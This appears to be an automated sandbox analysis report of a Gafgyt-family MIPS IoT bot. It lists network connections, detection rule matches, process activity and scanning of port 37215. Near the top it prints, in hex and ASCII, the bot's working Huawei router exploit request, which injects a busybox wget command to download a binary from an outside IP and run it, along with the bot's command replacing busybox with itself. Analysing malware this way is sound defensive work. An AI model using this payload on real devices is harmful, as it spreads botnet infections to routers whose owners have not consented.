                Source: unknownTCP traffic detected without corresponding DNS query: 41.223.52.113
                Source: unknownTCP traffic detected without corresponding DNS query: 41.194.237.177
                Source: unknownTCP traffic detected without corresponding DNS query: 157.181.3.65
                Source: unknownTCP traffic detected without corresponding DNS query: 157.31.244.233
                Source: unknownTCP traffic detected without corresponding DNS query: 157.162.111.165
                Source: unknownTCP traffic detected without corresponding DNS query: 48.58.83.67
                Source: unknownTCP traffic detected without corresponding DNS query: 41.230.206.92
                Source: unknownTCP traffic detected without corresponding DNS query: 157.130.127.237
                Source: unknownTCP traffic detected without corresponding DNS query: 41.200.75.196
                Source: unknownTCP traffic detected without corresponding DNS query: 41.106.19.91
                Source: unknownTCP traffic detected without corresponding DNS query: 171.114.236.11
                Source: global trafficDNS traffic detected: DNS query: ok.ditmemost.click
                Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: bot.mips.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: bot.mips.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                System Summary

                barindex
                Source: bot.mips.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: bot.mips.elf PID: 5426, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbot.armbot.arm7bot.mipsbot.mipselbot.x86_64bot.sh4bot.ppcbot.m68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdw5q6he3dbrsgmclkiu4to18npavj702f
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: bot.mips.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5426.1.00007fa458400000.00007fa458427000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: bot.mips.elf PID: 5426, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal100.troj.linELF@0/0@6/0
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/5263/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/230/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/110/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/231/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/111/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/232/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/112/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/233/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/113/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/234/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/114/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/235/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/115/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/236/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/116/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/237/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/117/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/238/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/118/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/239/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/119/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/914/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/10/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/917/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/11/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/12/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/13/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/14/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/15/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/16/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/17/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/18/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/19/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/240/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/3095/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/120/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/241/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/121/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/242/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/122/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/243/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/2/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/123/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/244/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/3/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/124/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/245/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1588/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/125/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/4/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/246/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/126/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/5/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/247/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/127/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/6/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/248/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/128/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/7/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/249/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/129/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/8/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/800/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/9/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1906/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/802/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/803/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/20/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/21/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/22/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/23/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/24/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/25/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/26/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/27/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/28/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/29/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/3420/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1482/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/490/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1480/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/250/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/371/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/130/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/251/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/131/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/252/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/132/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/253/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/254/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1238/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/134/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/255/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/256/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/257/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/378/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/3413/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/258/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/259/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/1475/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/936/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/30/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/816/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5438)File opened: /proc/35/cmdlineJump to behavior
                Source: /tmp/bot.mips.elf (PID: 5430)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/bot.mips.elf bin/busybox; chmod 777 bin/busybox"Jump to behavior
                Source: /bin/sh (PID: 5435)Chmod executable: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior
                Source: /bin/sh (PID: 5433)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
                Source: /bin/sh (PID: 5432)Rm executable: /usr/bin/rm -> rm -rf bin/busyboxJump to behavior
                Source: /usr/bin/chmod (PID: 5435)File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
                Source: /bin/sh (PID: 5435)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: unknownNetwork traffic detected: HTTP traffic on port 44368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34162 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37890 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39692 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56014 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53048 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56234 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60216 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33256 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59544 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48730 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57682 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53050 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52810 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60390 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57764 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47348 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39310 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46988 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46476 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35600 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38662 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44882 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53760 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53378 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54540 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56316 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46840 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57496 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43536 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42648 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44542 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52484 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56394 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52184 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37404 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53132 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59400 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57626 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40844 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55672 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58078 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59314 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44238 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49520 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48570 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37262 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44198 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47626 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39366 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39388 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59784 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57578 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38788 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59462 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54472 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53654 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48712 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60896 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55212 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34672 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41616 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39576 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58120 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58918 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56068 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45556 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43226 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56222 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57800 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36400 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36314 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43424 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55278 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45538 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48524 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57164 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39214 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46692 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56362 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44850 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37892 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48056 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44032 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44892 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58632 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58472 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50304 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33950 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43336 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42180 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48218 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35750 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56596 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38560 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44116 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56834 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57692 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36756 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33312 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57642 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34842 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44626 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55888 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34806 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58756 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55462 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58980 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42848 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35602 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37952 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40546 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57216 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42966 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39894 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45050 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46556 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42868 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55630 -> 37215
